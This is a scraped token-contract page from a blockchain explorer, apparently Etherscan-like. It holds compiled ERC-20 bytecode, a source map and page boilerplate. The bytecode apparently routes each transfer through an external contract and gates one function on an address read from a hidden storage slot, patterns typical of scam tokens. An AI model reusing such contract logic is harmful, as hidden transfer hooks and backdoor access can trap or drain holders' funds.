60008181526001602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610574908590610bc3565b60405180910390a3505050565b600061058d8484610461565b905060001981146105c557818110156105b85760405162461bcd60e51b81526004016103c690610a27565b6105c584848484036104cd565b50505050565b6001600160a01b0383166105f15760405162461bcd60e51b81526004016103c690610af5565b6001600160a01b0382166106175760405162461bcd60e51b81526004016103c69061095c565b61062183836107fb565b6002546064906001600160a01b031663cf6fe7d761063f8480610c1e565b848787426040518663ffffffff1660e01b8152600401610663959493929190610bcc565b602060405180830381600087803b15801561067d57600080fd5b505af1158015610691573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106b591906108d2565b6106bf9190610c1e565b506001600160a01b038316600090815260208190526040902054818110156106f95760405162461bcd60e51b81526004016103c690610a5e565b6001600160a01b0380851660008181526020819052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610757908690610bc3565b60405180910390a36105c58484846107ff565b6107726104c9565b6001600160a01b031661078361036d565b6001600160a01b03161461036b5760405162461bcd60e51b81526004016103c690610ac0565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b5050565b505050565b80356001600160a01b038116811461035457600080fd5b60006020828403121561082c578081fd5b61083582610804565b9392505050565b6000806040838503121561084e578081fd5b61085783610804565b915061086560208401610804565b90509250929050565b600080600060608486031215610882578081fd5b61088b84610804565b925061089960208501610804565b9150604084013590509250925092565b600080604083850312156108bb578182fd5b6108c483610804565b946020939093013593505050565b6000602082840312156108e3578081fd5b5051919050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602080835283518082850152825b8181101561093557858101830151858201604001528201610919565b818111156109465783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b602080825260029082015261612160f01b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b94855260208501939093526001600160a01b039182166040850152166060830152608082015260a00190565b60ff91909116815260200190565b60008219821115610c1957610c19610c70565b500190565b600082821015610c3057610c30610c70565b500390565b600281046001821680610c4957607f821691505b60208210811415610c6a57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea264697066735822122012055638db241a72c09623e62aed20bf95a5d1408f625a3ea9a763fa599515e064736f6c63430008000033

Deployed Bytecode Sourcemap

22618:94:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12748:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15099:201;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;13868:108::-;;;:::i;:::-;;;;;;;:::i;15880:295::-;;;;;;:::i;:::-;;:::i;13710:93::-;;;:::i;:::-;;;;;;;:::i;16584:238::-;;;;;;:::i;:::-;;:::i;14039:127::-;;;;;;:::i;:::-;;:::i;2781:103::-;;;:::i;:::-;;2133:87;;;:::i;:::-;;;;;;;:::i;12967:104::-;;;:::i;17325:424::-;;;;;;:::i;:::-;;:::i;14372:193::-;;;;;;:::i;:::-;;:::i;17757:234::-;;;;;;:::i;:::-;;:::i;14628:151::-;;;;;;:::i;:::-;;:::i;3039:201::-;;;;;;:::i;:::-;;:::i;12748:100::-;12802:13;12835:5;12828:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12748:100;:::o;15099:201::-;15182:4;15199:13;15215:12;:10;:12::i;:::-;15199:28;;15238:32;15247:5;15254:7;15263:6;15238:8;:32::i;:::-;-1:-1:-1;15288:4:0;;15099:201;-1:-1:-1;;;15099:201:0:o;13868:108::-;13956:12;;13868:108;:::o;15880:295::-;16011:4;16028:15;16046:12;:10;:12::i;:::-;16028:30;;16069:38;16085:4;16091:7;16100:6;16069:15;:38::i;:::-;16118:27;16128:4;16134:2;16138:6;16118:9;:27::i;:::-;-1:-1:-1;16163:4:0;;15880:295;-1:-1:-1;;;;15880:295:0:o;13710:93::-;13793:2;13710:93;:::o;16584:238::-;16672:4;16689:13;16705:12;:10;:12::i;:::-;16689:28;;16728:64;16737:5;16744:7;16781:10;16753:25;16763:5;16770:7;16753:9;:25::i;:::-;:38;;;;:::i;:::-;16728:8;:64::i;14039:127::-;-1:-1:-1;;;;;14140:18:0;;14113:7;14140:18;;;;;;;;;;;14039:127;;;;:::o;2781:103::-;2019:13;:11;:13::i;:::-;2846:30:::1;2873:1;2846:18;:30::i;:::-;2781:103::o:0;2133:87::-;2206:6;;-1:-1:-1;;;;;2206:6:0;2133:87;:::o;12967:104::-;13023:13;13056:7;13049:14;;;;;:::i;17325:424::-;17418:4;17435:13;17451:12;:10;:12::i;:::-;17435:28;;17474:24;17501:25;17511:5;17518:7;17501:9;:25::i;:::-;17474:52;;17565:15;17545:16;:35;;17537:85;;;;-1:-1:-1;;;17537:85:0;;;;;;;:::i;:::-;;;;;;;;;17650:60;17659:5;17666:7;17694:15;17675:16;:34;17650:8;:60::i;14372:193::-;14451:4;14468:13;14484:12;:10;:12::i;:::-;14468:28;;14507;14517:5;14524:2;14528:6;14507:9;:28::i;17757:234::-;17845:35;11942:66;17845:26;:35::i;:::-;:41;-1:-1:-1;;;;;17845:41:0;17831:10;:55;17823:70;;;;-1:-1:-1;;;17823:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;17964:10:0;;;17904:37;17964:10;;;;;;;;;;:19;17757:234::o;14628:151::-;-1:-1:-1;;;;;14744:18:0;;;14717:7;14744:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;14628:151::o;3039:201::-;2019:13;:11;:13::i;:::-;-1:-1:-1;;;;;3128:22:0;::::1;3120:73;;;;-1:-1:-1::0;;;3120:73:0::1;;;;;;;:::i;:::-;3204:28;3223:8;3204:18;:28::i;:::-;3039:201:::0;:::o;5230:195::-;5403:4;5378:40::o;678:98::-;758:10;678:98;:::o;19966:380::-;-1:-1:-1;;;;;20102:19:0;;20094:68;;;;-1:-1:-1;;;20094:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;20181:21:0;;20173:68;;;;-1:-1:-1;;;20173:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;20254:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;20306:32;;;;;20284:6;;20306:32;:::i;:::-;;;;;;;;19966:380;;;:::o;20637:441::-;20772:24;20799:25;20809:5;20816:7;20799:9;:25::i;:::-;20772:52;;-1:-1:-1;;20839:16:0;:37;20835:236;;20921:6;20901:16;:26;;20893:68;;;;-1:-1:-1;;;20893:68:0;;;;;;;:::i;:::-;20997:51;21006:5;21013:7;21041:6;21022:16;:25;20997:8;:51::i;:::-;20637:441;;;;:::o;18461:1067::-;-1:-1:-1;;;;;18592:18:0;;18584:68;;;;-1:-1:-1;;;18584:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;18671:16:0;;18663:64;;;;-1:-1:-1;;;18663:64:0;;;;;;;:::i;:::-;18740:30;18761:4;18767:2;18740:20;:30::i;:::-;18783:4;;19026:3;;-1:-1:-1;;;;;18783:4:0;:70;18910:15;18919:6;;18910:15;:::i;:::-;18940:6;18961:4;18980:2;18997:15;18783:240;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:246;;;;:::i;:::-;-1:-1:-1;;;;;;19064:15:0;;19042:19;19064:15;;;;;;;;;;;19098:21;;;;19090:72;;;;-1:-1:-1;;;19090:72:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;19190:15:0;;;:9;:15;;;;;;;;;;;19208:20;;;19190:38;;19396:13;;;;;;;;;;:23;;;;;;19444:26;;;;;;19222:6;;19444:26;:::i;:::-;;;;;;;;19483:37;19503:4;19509:2;19513:6;19483:19;:37::i;2298:132::-;2373:12;:10;:12::i;:::-;-1:-1:-1;;;;;2362:23:0;:7;:5;:7::i;:::-;-1:-1:-1;;;;;2362:23:0;;2354:68;;;;-1:-1:-1;;;2354:68:0;;;;;;;:::i;3400:191::-;3493:6;;;-1:-1:-1;;;;;3510:17:0;;;-1:-1:-1;;;;;;3510:17:0;;;;;;;3543:40;;3493:6;;;3510:17;3493:6;;3543:40;;3474:16;;3543:40;3400:191;;:::o;21678:106::-;;;:::o;22388:124::-;;;;:::o;14:175:1:-;84:20;;-1:-1:-1;;;;;133:31:1;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;:::-;345:41;264:128;-1:-1:-1;;;264:128:1:o;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:1:o;1294:194::-;;1417:2;1405:9;1396:7;1392:23;1388:32;1385:2;;;1438:6;1430;1423:22;1385:2;-1:-1:-1;1466:16:1;;1375:113;-1:-1:-1;1375:113:1:o;1493:203::-;-1:-1:-1;;;;;1657:32:1;;;;1639:51;;1627:2;1612:18;;1594:102::o;1701:187::-;1866:14;;1859:22;1841:41;;1829:2;1814:18;;1796:92::o;1893:603::-;;2034:2;2063;2052:9;2045:21;2095:6;2089:13;2138:6;2133:2;2122:9;2118:18;2111:34;2163:4;2176:140;2190:6;2187:1;2184:13;2176:140;;;2285:14;;;2281:23;;2275:30;2251:17;;;2270:2;2247:26;2240:66;2205:10;;2176:140;;;2334:6;2331:1;2328:13;2325:2;;;2404:4;2399:2;2390:6;2379:9;2375:22;2371:31;2364:45;2325:2;-1:-1:-1;2480:2:1;2459:15;-1:-1:-1;;2455:29:1;2440:45;;;;2487:2;2436:54;;2014:482;-1:-1:-1;;;2014:482:1:o;2501:399::-;2703:2;2685:21;;;2742:2;2722:18;;;2715:30;2781:34;2776:2;2761:18;;2754:62;-1:-1:-1;;;2847:2:1;2832:18;;2825:33;2890:3;2875:19;;2675:225::o;2905:402::-;3107:2;3089:21;;;3146:2;3126:18;;;3119:30;3185:34;3180:2;3165:18;;3158:62;-1:-1:-1;;;3251:2:1;3236:18;;3229:36;3297:3;3282:19;;3079:228::o;3312:398::-;3514:2;3496:21;;;3553:2;3533:18;;;3526:30;3592:34;3587:2;3572:18;;3565:62;-1:-1:-1;;;3658:2:1;3643:18;;3636:32;3700:3;3685:19;;3486:224::o;3715:353::-;3917:2;3899:21;;;3956:2;3936:18;;;3929:30;3995:31;3990:2;3975:18;;3968:59;4059:2;4044:18;;3889:179::o;4073:402::-;4275:2;4257:21;;;4314:2;4294:18;;;4287:30;4353:34;4348:2;4333:18;;4326:62;-1:-1:-1;;;4419:2:1;4404:18;;4397:36;4465:3;4450:19;;4247:228::o;4480:325::-;4682:2;4664:21;;;4721:1;4701:18;;;4694:29;-1:-1:-1;;;4754:2:1;4739:18;;4732:32;4796:2;4781:18;;4654:151::o;4810:356::-;5012:2;4994:21;;;5031:18;;;5024:30;5090:34;5085:2;5070:18;;5063:62;5157:2;5142:18;;4984:182::o;5171:401::-;5373:2;5355:21;;;5412:2;5392:18;;;5385:30;5451:34;5446:2;5431:18;;5424:62;-1:-1:-1;;;5517:2:1;5502:18;;5495:35;5562:3;5547:19;;5345:227::o;5577:400::-;5779:2;5761:21;;;5818:2;5798:18;;;5791:30;5857:34;5852:2;5837:18;;5830:62;-1:-1:-1;;;5923:2:1;5908:18;;5901:34;5967:3;5952:19;;5751:226::o;5982:401::-;6184:2;6166:21;;;6223:2;6203:18;;;6196:30;6262:34;6257:2;6242:18;;6235:62;-1:-1:-1;;;6328:2:1;6313:18;;6306:35;6373:3;6358:19;;6156:227::o;6388:177::-;6534:25;;;6522:2;6507:18;;6489:76::o;6570:519::-;6829:25;;;6885:2;6870:18;;6863:34;;;;-1:-1:-1;;;;;6971:15:1;;;6966:2;6951:18;;6944:43;7023:15;7018:2;7003:18;;6996:43;7070:3;7055:19;;7048:35;6816:3;6801:19;;6783:306::o;7094:184::-;7266:4;7254:17;;;;7236:36;;7224:2;7209:18;;7191:87::o;7283:128::-;;7354:1;7350:6;7347:1;7344:13;7341:2;;;7360:18;;:::i;:::-;-1:-1:-1;7396:9:1;;7331:80::o;7416:125::-;;7484:1;7481;7478:8;7475:2;;;7489:18;;:::i;:::-;-1:-1:-1;7526:9:1;;7465:76::o;7546:380::-;7631:1;7621:12;;7678:1;7668:12;;;7689:2;;7743:4;7735:6;7731:17;7721:27;;7689:2;7796;7788:6;7785:14;7765:18;7762:38;7759:2;;;7842:10;7837:3;7833:20;7830:1;7823:31;7877:4;7874:1;7867:15;7905:4;7902:1;7895:15;7759:2;;7601:325;;;:::o;7931:127::-;7992:10;7987:3;7983:20;7980:1;7973:31;8023:4;8020:1;8013:15;8047:4;8044:1;8037:15

Swarm Source

ipfs://12055638db241a72c09623e62aed20bf95a5d1408f625a3ea9a763fa599515e0
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.